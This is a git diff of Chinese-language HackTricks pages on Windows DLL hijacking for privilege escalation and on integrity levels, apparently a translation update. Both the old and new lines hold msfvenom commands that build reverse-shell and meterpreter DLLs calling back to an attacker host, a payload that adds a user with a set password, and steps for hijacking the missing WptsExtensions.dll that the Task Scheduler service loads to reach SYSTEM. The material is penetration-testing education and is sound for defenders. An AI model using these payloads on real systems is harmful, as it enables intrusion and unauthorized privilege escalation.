-- 如果DLL被识别为当前Windows版本的已知DLL,系统将使用其版本的已知DLL以及任何依赖的DLL,跳过搜索过程。注册表键HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs保存了这些已知DLL的列表。
-- 如果DLL有依赖项,系统会按照它们仅通过模块名称指示的方式进行搜索这些依赖的DLL,而不管最初的DLL是否是通过完整路径标识的。
+Windows 文档中指出了标准 DLL 搜索顺序的某些例外:
+
+* 当遇到 **与内存中已加载的 DLL 同名的 DLL** 时,系统会绕过通常的搜索。相反,它会在默认使用内存中已加载的 DLL 之前检查重定向和清单。**在这种情况下,系统不会进行 DLL 搜索**。
+* 在 DLL 被识别为当前 Windows 版本的 **已知 DLL** 的情况下,系统将使用其版本的已知 DLL 及其任何依赖 DLL,**跳过搜索过程**。注册表项 **HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** 保存这些已知 DLL 的列表。
+* 如果 **DLL 有依赖项**,则对这些依赖 DLL 的搜索将像仅通过其 **模块名称** 指示一样进行,而不管初始 DLL 是否通过完整路径识别。
### 提升权限
**要求**:
-- 确定一个将在**不同权限**下运行或将要运行的进程(水平或侧向移动),该进程**缺少一个DLL**。
-- 确保**具有写入访问权限**的**目录**中将**搜索**该**DLL**。这个位置可能是可执行文件的目录或系统路径中的一个目录。
+* 确定一个在 **不同权限** 下运行或将要运行的进程(水平或横向移动),该进程 **缺少 DLL**。
+* 确保在 **DLL** 将被 **搜索的** 任何 **目录** 中有 **写入权限**。此位置可能是可执行文件的目录或系统路径中的目录。
-是的,这些要求很难找到,因为**默认情况下很难找到一个缺少DLL的特权可执行文件**,而且**更难以在系统路径文件夹上拥有写权限**(默认情况下是不允许的)。但是,在配置错误的环境中,这是可能的。\
-如果你很幸运地发现自己符合要求,你可以查看[UACME](https://github.com/hfiref0x/UACME)项目。即使该项目的**主要目标是绕过UAC**,你可能会在那里找到一个用于你所使用的Windows版本的DLL劫持的**PoC**(可能只需更改具有写权限的文件夹的路径)。
+是的,要求很难找到,因为 **默认情况下,找不到缺少 DLL 的特权可执行文件是有点奇怪的**,而且在系统路径文件夹中拥有写入权限 **更奇怪**(默认情况下您无法做到)。但是,在配置错误的环境中,这是可能的。\
+如果您运气好,满足要求,可以查看 [UACME](https://github.com/hfiref0x/UACME) 项目。即使 **该项目的主要目标是绕过 UAC**,您也可能会在那里找到一个 Windows 版本的 DLL 劫持的 **PoC**(可能只需更改您有写入权限的文件夹的路径)。
-请注意,你可以通过以下方式**检查文件夹中的权限**:
+请注意,您可以通过以下方式 **检查文件夹中的权限**:
```bash
accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"
```
-并**检查路径内所有文件夹的权限**:
+并**检查PATH中所有文件夹的权限**:
```bash
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
```
-您还可以使用以下命令检查可执行文件的导入项和 DLL 的导出项:
+您还可以使用以下命令检查可执行文件的导入和 DLL 的导出:
```c
dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /export /path/file.dll
```
-要了解如何**滥用Dll劫持来提升权限**,并具有在**系统路径文件夹**中写入权限,请查看:
+为了获取有关如何**利用Dll劫持提升权限**的完整指南,检查:
{% content-ref url="writable-sys-path-+dll-hijacking-privesc.md" %}
[writable-sys-path-+dll-hijacking-privesc.md](writable-sys-path-+dll-hijacking-privesc.md)
@@ -116,21 +118,21 @@ dumpbin /export /path/file.dll
### 自动化工具
-[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否具有在系统路径内任何文件夹上的写入权限。\
-其他有趣的自动化工具来发现此漏洞是**PowerSploit功能**:_Find-ProcessDLLHijack_、_Find-PathDLLHijack_和_Write-HijackDll_。
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否在系统路径中的任何文件夹上具有写入权限。\
+其他发现此漏洞的有趣自动化工具包括**PowerSploit函数**:_Find-ProcessDLLHijack_,_Find-PathDLLHijack_和_Write-HijackDll_。
### 示例
-如果您发现了一个可利用的场景,成功利用它的一个最重要的事情将是**创建一个至少导出可执行文件将从中导入的所有函数的dll**。无论如何,请注意,Dll劫持很方便,可以从中间完整性级别升级到高级别**(绕过UAC)**或从**高完整性升级到SYSTEM**。您可以在此dll劫持研究中找到一个创建有效dll的示例,该研究专注于用于执行的dll劫持:[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
-此外,在**下一部分**中,您可以找到一些**基本dll代码**,这些代码可能对**模板**或创建具有**不需要导出的函数的dll**有用。
+如果您发现一个可利用的场景,成功利用它的最重要的事情之一是**创建一个导出至少所有可执行文件将从中导入的函数的dll**。无论如何,请注意,Dll劫持在[**从中等完整性级别提升到高完整性(绕过UAC)**](../../authentication-credentials-uac-and-efs/#uac)或从[**高完整性提升到SYSTEM**](../#from-high-integrity-to-system)**时非常有用。**您可以在这个专注于执行的dll劫持研究中找到**如何创建有效dll的示例:[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
+此外,在**下一节**中,您可以找到一些**基本dll代码**,这些代码可能作为**模板**或用于创建**导出非必需函数的dll**。
-## **创建和编译Dlls**
+## **创建和编译Dll**
### **Dll代理**
-基本上,**Dll代理**是一个能够**在加载时执行您的恶意代码**,但也能够**公开**并**按照**实际库**的要求**工作的**Dll**。
+基本上,**Dll代理**是一个能够**在加载时执行您的恶意代码**的Dll,同时也能**暴露**并**按预期工作**,通过**将所有调用转发到真实库**。
-使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus),您实际上可以**指定一个可执行文件并选择要代理的库**,然后**生成一个代理dll**,或者**指定Dll**并**生成一个代理dll**。
+使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus),您可以**指定一个可执行文件并选择要代理的库**,并**生成一个代理dll**,或**指定Dll并生成一个代理dll**。
### **Meterpreter**
@@ -142,13 +144,13 @@ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
```
-**创建一个用户(x86 我没有看到 x64 版本):**
+**创建用户(x86 我没有看到 x64 版本):**
```
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
```
-### 你自己
+### 你自己的
-请注意,在几种情况下,您编译的 DLL 必须**导出多个函数**,这些函数将由受害进程加载,如果这些函数不存在,**二进制文件将无法加载**它们,**利用将失败**。
+请注意,在多个情况下,您编译的 Dll 必须 **导出多个函数**,这些函数将被受害者进程加载,如果这些函数不存在,**二进制文件将无法加载**它们,**利用将失败**。
```c
// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
@@ -229,27 +231,28 @@ break;
return TRUE;
}
```
-## 参考资料
+## 参考
* [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
* [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
-**漏洞悬赏提示**: **注册** Intigriti,一个由黑客创建的高级**漏洞悬赏平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的悬赏金!
+**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
+{% hint style="success" %}
+学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)系列
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 04cbaafc6..f06cb8ffb 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -1,40 +1,41 @@
-# 可写的 Sys 路径 + Dll 劫持提权
+# Writable Sys Path +Dll Hijacking Privesc
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
-## 简介
+## 介绍
-如果您发现可以**在系统路径文件夹中写入**(请注意,如果您可以在用户路径文件夹中写入,这将不起作用),则可能可以**提升系统权限**。
+如果你发现你可以在 **系统路径文件夹** 中 **写入**(请注意,如果你可以在用户路径文件夹中写入,这将无效),那么你可能可以在系统中 **提升权限**。
-为了做到这一点,您可以滥用**Dll 劫持**,在这种情况下,您将**劫持一个由具有比您更高权限的服务或进程加载的库**,因为该服务正在加载一个在整个系统中可能甚至不存在的 Dll,它将尝试从您可以写入的系统路径中加载它。
+为了做到这一点,你可以利用 **Dll Hijacking**,你将 **劫持一个被服务或进程加载的库**,该服务或进程的 **权限高于你的**,而且因为该服务正在加载一个可能在整个系统中根本不存在的 Dll,它将尝试从你可以写入的系统路径加载它。
-有关**什么是 Dll 劫持**的更多信息,请查看:
+有关 **什么是 Dll Hijacking** 的更多信息,请查看:
{% content-ref url="./" %}
[.](./)
{% endcontent-ref %}
-## 使用 Dll 劫持进行提权
+## 使用 Dll Hijacking 提升权限
### 查找缺失的 Dll
-您需要做的第一件事是**识别一个正在以比您更高权限运行**的进程,该进程正在尝试**从您可以写入的系统路径加载一个 Dll**。
+你需要做的第一件事是 **识别一个运行权限高于你的进程**,该进程正在尝试 **从你可以写入的系统路径加载 Dll**。
-在这种情况下的问题是,这些进程可能已经在运行。要找出哪些 Dll 缺少服务,您需要尽快启动 procmon(在进程加载之前)。因此,要查找缺少的 .dll,请执行以下操作:
+在这种情况下的问题是,这些进程可能已经在运行。要找出哪些 Dll 缺失,你需要尽快启动 procmon(在进程加载之前)。因此,要查找缺失的 .dll,请执行:
-* **创建**文件夹 `C:\privesc_hijacking` 并将路径 `C:\privesc_hijacking` 添加到**系统路径环境变量**。您可以**手动**执行此操作,也可以使用**PS**:
+* **创建** 文件夹 `C:\privesc_hijacking` 并将路径 `C:\privesc_hijacking` 添加到 **系统路径环境变量**。你可以 **手动** 或使用 **PS** 来完成此操作:
```powershell
# Set the folder path to create and check events for
$folderPath = "C:\privesc_hijacking"
@@ -51,43 +52,58 @@ $newPath = "$envPath;$folderPath"
[Environment]::SetEnvironmentVariable("PATH", $newPath, "Machine")
}
```
-* 启动 **`procmon`** 并转到 **`Options`** --> **`Enable boot logging`**,然后在提示中按 **`OK`**。
-* 然后,**重新启动**。计算机重新启动后,**`procmon`** 将立即开始记录事件。
-* 一旦 **Windows** 启动,请再次执行 `procmon`,它会告诉您它一直在运行,并询问您是否要将事件存储在文件中。选择 **yes** 并将事件存储在文件中。
-* **文件** 生成后,关闭已打开的 **`procmon`** 窗口并打开事件文件。
-* 添加以下 **过滤器**,您将找到所有一些 **进程尝试从可写的 System Path 文件夹加载** 的 Dlls:
+* 启动 **`procmon`**,然后转到 **`Options`** --> **`Enable boot logging`**,在提示中按 **`OK`**。
+* 然后,**重启**。当计算机重新启动时,**`procmon`** 将尽快开始 **记录** 事件。
+* 一旦 **Windows** 启动,再次执行 **`procmon`**,它会告诉你它已经在运行,并会 **询问你是否要将** 事件存储在文件中。选择 **是** 并 **将事件存储在文件中**。
+* **在** **文件** 生成后,**关闭** 打开的 **`procmon`** 窗口并 **打开事件文件**。
+* 添加这些 **过滤器**,你将找到所有某些 **进程尝试从可写的系统路径文件夹加载的** Dll:
.png)
-### 丢失的 Dlls
+### 漏掉的 Dll
-在一个免费的 **虚拟 (vmware) Windows 11 机器** 上运行后,我得到了以下结果:
+在一台免费的 **虚拟 (vmware) Windows 11 机器** 上运行此命令,我得到了以下结果:
.png)
-在这种情况下,.exe 是无用的,所以请忽略它们,丢失的 DLL 来自于:
+在这种情况下,.exe 是无用的,所以忽略它们,漏掉的 DLL 来自:
-| 服务 | Dll | CMD 行 |
-| ------------------------------- | ------------------ | -------------------------------------------------------------------- |
-| 任务计划程序 (Schedule) | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule` |
+| 服务 | Dll | CMD 行 |
+| -------------------------------- | ------------------ | -------------------------------------------------------------------- |
+| 任务调度程序 (Schedule) | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule` |
| 诊断策略服务 (DPS) | Unknown.DLL | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
-| ??? | SharedRes.dll | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup` |
+| ??? | SharedRes.dll | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup` |
-找到这些后,我发现了这篇有趣的博客文章,也解释了如何 [**滥用 WptsExtensions.dll 进行权限提升**](https://juggernaut-sec.com/dll-hijacking/#Windows\_10\_Phantom\_DLL\_Hijacking\_-\_WptsExtensionsdll)。这就是我们 **现在要做的事情**。
+找到这个之后,我发现了一篇有趣的博客文章,它也解释了如何 [**滥用 WptsExtensions.dll 进行权限提升**](https://juggernaut-sec.com/dll-hijacking/#Windows\_10\_Phantom\_DLL\_Hijacking\_-\_WptsExtensionsdll)。这正是我们 **现在要做的**。
### 利用
-因此,为了 **提升权限**,我们将劫持库 **WptsExtensions.dll**。有了 **路径** 和 **名称**,我们只需要 **生成恶意 dll**。
+因此,为了 **提升权限**,我们将劫持库 **WptsExtensions.dll**。拥有 **路径** 和 **名称** 后,我们只需 **生成恶意 dll**。
-您可以[**尝试使用这些示例之一**](./#creating-and-compiling-dlls)。您可以运行有效载荷,如:获取反向 shell、添加用户、执行信标...
+你可以 [**尝试使用这些示例中的任何一个**](./#creating-and-compiling-dlls)。你可以运行有效载荷,例如:获取反向 shell,添加用户,执行信标...
{% hint style="warning" %}
-请注意,**并非所有服务都以 `NT AUTHORITY\SYSTEM` 运行**,有些也以 **`NT AUTHORITY\LOCAL SERVICE`** 运行,后者权限较低,您 **无法创建新用户** 来滥用其权限。\
-但是,该用户具有 **`seImpersonate`** 权限,因此您可以使用 [**potato suite 来提升权限**](../roguepotato-and-printspoofer.md)。因此,在这种情况下,获取反向 shell 是一个比尝试创建用户更好的选择。
+请注意 **并非所有服务都以** **`NT AUTHORITY\SYSTEM`** 运行,有些服务也以 **`NT AUTHORITY\LOCAL SERVICE`** 运行,该服务具有 **较少的权限**,你 **将无法创建新用户** 来滥用其权限。\
+然而,该用户具有 **`seImpersonate`** 权限,因此你可以使用[ **potato suite 来提升权限**](../roguepotato-and-printspoofer.md)。因此,在这种情况下,反向 shell 是比尝试创建用户更好的选择。
{% endhint %}
-在撰写本文时,**任务计划程序** 服务是以 **Nt AUTHORITY\SYSTEM** 运行的。
+在撰写时,**任务调度程序** 服务以 **Nt AUTHORITY\SYSTEM** 运行。
-生成了 **恶意 Dll** 后(在我的情况下,我使用了 x64 反向 shell,我得到了一个 shell,但是防御程序将其杀死,因为它来自 msfvenom),将其保存在可写的 System Path 中,并将其命名为 **WptsExtensions.dll**,然后 **重新启动** 计算机(或重新启动服务或执行必要的操作以重新运行受影响的服务/程序)。
+在 **生成恶意 Dll** 后(在我的情况下,我使用了 x64 反向 shell 并得到了一个 shell,但防御者杀死了它,因为它来自 msfvenom),将其保存到可写的系统路径中,命名为 **WptsExtensions.dll**,然后 **重启** 计算机(或重启服务或做任何必要的事情以重新运行受影响的服务/程序)。
-当服务重新启动时,**dll 应该被加载和执行**(您可以**重复使用** **procmon** 技巧来检查 **库是否按预期加载**)。
+当服务重新启动时,**dll 应该被加载并执行**(你可以 **重用** **procmon** 技巧来检查 **库是否按预期加载**)。
+
+{% hint style="success" %}
+学习并实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习并实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+支持 HackTricks
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+
+
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 89770949b..7a097a2bd 100644
--- a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -1,26 +1,27 @@
-# 完整性级别
+# Integrity Levels
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+Support HackTricks
-支持HackTricks的其他方式:
-
-- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
### [WhiteIntel](https://whiteintel.io)
.png)
-[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
+[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**。
-WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
+WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@@ -28,31 +29,31 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
***
-## 完整性级别
+## Integrity Levels
-在Windows Vista及更高版本中,所有受保护的项目都带有**完整性级别**标记。这种设置通常为文件和注册表键分配“中等”完整性级别,除了某些文件夹和文件,Internet Explorer 7可以以低完整性级别写入。默认行为是由标准用户启动的进程具有中等完整性级别,而服务通常在系统完整性级别下运行。高完整性标签保护根目录。
+在 Windows Vista 及更高版本中,所有受保护的项目都有一个 **完整性级别** 标签。此设置通常将“中等”完整性级别分配给文件和注册表项,除了某些 Internet Explorer 7 可以以低完整性级别写入的文件和文件夹。默认情况下,标准用户启动的进程具有中等完整性级别,而服务通常在系统完整性级别下运行。高完整性标签保护根目录。
-一个关键规则是对象不能被具有低于对象级别的完整性级别的进程修改。完整性级别包括:
+一个关键规则是,低于对象级别的进程无法修改该对象。完整性级别如下:
-- **不受信任**:此级别适用于具有匿名登录的进程。 %%%示例:Chrome%%%
-- **低**:主要用于互联网交互,特别是在Internet Explorer的受保护模式下,影响相关文件和进程,以及某些文件夹,如**临时互联网文件夹**。低完整性进程面临重大限制,包括无注册表写访问权限和有限的用户配置文件写访问权限。
-- **中等**:大多数活动的默认级别,分配给标准用户和没有特定完整性级别的对象。即使管理员组的成员也默认在此级别操作。
-- **高**:保留给管理员使用,允许他们修改低完整性级别的对象,包括高级别对象本身。
-- **系统**:Windows内核和核心服务的最高操作级别,即使对于管理员也无法接触,确保重要系统功能的保护。
-- **安装程序**:一个独特的级别,高于所有其他级别,使得在此级别的对象能够卸载任何其他对象。
+* **不可信**:此级别适用于匿名登录的进程。 %%%示例:Chrome%%%
+* **低**:主要用于互联网交互,特别是在 Internet Explorer 的受保护模式中,影响相关文件和进程,以及某些文件夹,如 **临时 Internet 文件夹**。低完整性进程面临重大限制,包括无法写入注册表和有限的用户配置文件写入访问权限。
+* **中**:大多数活动的默认级别,分配给标准用户和没有特定完整性级别的对象。即使是管理员组的成员默认也在此级别下操作。
+* **高**:保留给管理员,允许他们修改低完整性级别的对象,包括高完整性级别的对象。
+* **系统**:Windows 内核和核心服务的最高操作级别,甚至管理员也无法接触,确保保护重要的系统功能。
+* **安装程序**:一个独特的级别,超越所有其他级别,使该级别的对象能够卸载任何其他对象。
-您可以使用**Sysinternals**的**Process Explorer**获取进程的完整性级别,访问进程的**属性**并查看“**安全**”选项卡:
+您可以使用 **Sysinternals** 的 **Process Explorer** 获取进程的完整性级别,访问进程的 **属性** 并查看 "**安全性**" 选项卡:
.png>)
-您还可以使用`whoami /groups`获取您的**当前完整性级别**。
+您还可以使用 `whoami /groups` 获取您的 **当前完整性级别**
.png>)
-### 文件系统中的完整性级别
+### Integrity Levels in File-system
-文件系统中的对象可能需要一个**最低完整性级别要求**,如果进程没有这个完整性级别,则无法与其交互。\
-例如,让我们**从普通用户控制台创建一个常规文件并检查权限**:
+文件系统中的对象可能需要 **最低完整性级别要求**,如果进程没有此完整性级别,则无法与其交互。\
+例如,让我们 **从普通用户控制台创建一个常规文件并检查权限**:
```
echo asd >asd.txt
icacls asd.txt
@@ -63,7 +64,7 @@ NT AUTHORITY\INTERACTIVE:(I)(M,DC)
NT AUTHORITY\SERVICE:(I)(M,DC)
NT AUTHORITY\BATCH:(I)(M,DC)
```
-现在,让我们将文件的最低完整性级别分配为**高**。这**必须从一个以**管理员**身份运行的控制台**执行,因为**普通控制台**将在中间完整性级别下运行,**无法**将高完整性级别分配给对象:
+现在,让我们为文件分配一个最低的完整性级别为 **高**。这 **必须在以** 管理员 **身份运行的控制台中完成,因为** 常规控制台 **将以中等完整性级别运行,并且** 不允许 **将高完整性级别分配给对象:
```
icacls asd.txt /setintegritylevel(oi)(ci) High
processed file: asd.txt
@@ -78,7 +79,7 @@ NT AUTHORITY\SERVICE:(I)(M,DC)
NT AUTHORITY\BATCH:(I)(M,DC)
Mandatory Label\High Mandatory Level:(NW)
```
-这就是事情变得有趣的地方。您可以看到用户 `DESKTOP-IDJHTKP\user` 对文件拥有**完全权限**(实际上这是创建文件的用户),但是,由于实施了最低完整性级别,他将无法再修改文件,除非他在高完整性级别下运行(请注意他仍然可以读取文件):
+这是事情变得有趣的地方。你可以看到用户 `DESKTOP-IDJHTKP\user` 对该文件拥有 **完全权限**(实际上这是创建该文件的用户),然而,由于实施的最低完整性级别,他将无法再修改该文件,除非他在高完整性级别下运行(请注意,他仍然可以读取该文件):
```
echo 1234 > asd.txt
Access is denied.
@@ -88,12 +89,12 @@ C:\Users\Public\asd.txt
Access is denied.
```
{% hint style="info" %}
-**因此,当文件具有最低完整性级别时,为了修改它,您需要至少以该完整性级别运行。**
+**因此,当一个文件具有最低完整性级别时,要修改它,您需要至少在该完整性级别运行。**
{% endhint %}
### 二进制文件中的完整性级别
-我在`C:\Windows\System32\cmd-low.exe`中制作了`cmd.exe`的副本,并从管理员控制台将其设置为**低完整性级别:**
+我在 `C:\Windows\System32\cmd-low.exe` 中复制了 `cmd.exe` 并从管理员控制台将其设置为 **低完整性级别:**
```
icacls C:\Windows\System32\cmd-low.exe
C:\Windows\System32\cmd-low.exe NT AUTHORITY\SYSTEM:(I)(F)
@@ -103,40 +104,41 @@ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
Mandatory Label\Low Mandatory Level:(NW)
```
-现在,当我运行 `cmd-low.exe` 时,它将在**低完整性级别**下运行,而不是中等级别:
+现在,当我运行 `cmd-low.exe` 时,它将**在低完整性级别下运行**,而不是中等级别:
.png>)
-对于好奇的人,如果您将高完整性级别分配给一个二进制文件(`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`),它不会自动以高完整性级别运行(如果您从中等完整性级别调用它--默认情况下--它将在中等完整性级别下运行)。
+对于好奇的人,如果你将高完整性级别分配给一个二进制文件(`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`),它不会自动以高完整性级别运行(如果你从中等完整性级别调用它 -- 默认情况下 -- 它将以中等完整性级别运行)。
### 进程中的完整性级别
-并非所有文件和文件夹都有最低完整性级别,**但所有进程都在一个完整性级别下运行**。与文件系统发生的情况类似,**如果一个进程想要在另一个进程内写入,它必须至少具有相同的完整性级别**。这意味着低完整性级别的进程无法以完全访问权限打开具有中等完整性级别的进程的句柄。
+并非所有文件和文件夹都有最低完整性级别,**但所有进程都在完整性级别下运行**。与文件系统发生的情况类似,**如果一个进程想要在另一个进程内写入,它必须至少具有相同的完整性级别**。这意味着低完整性级别的进程无法以完全访问权限打开中等完整性级别进程的句柄。
-由于在本节和前一节中讨论的限制,从安全角度来看,**始终建议以尽可能低的完整性级别运行进程**。
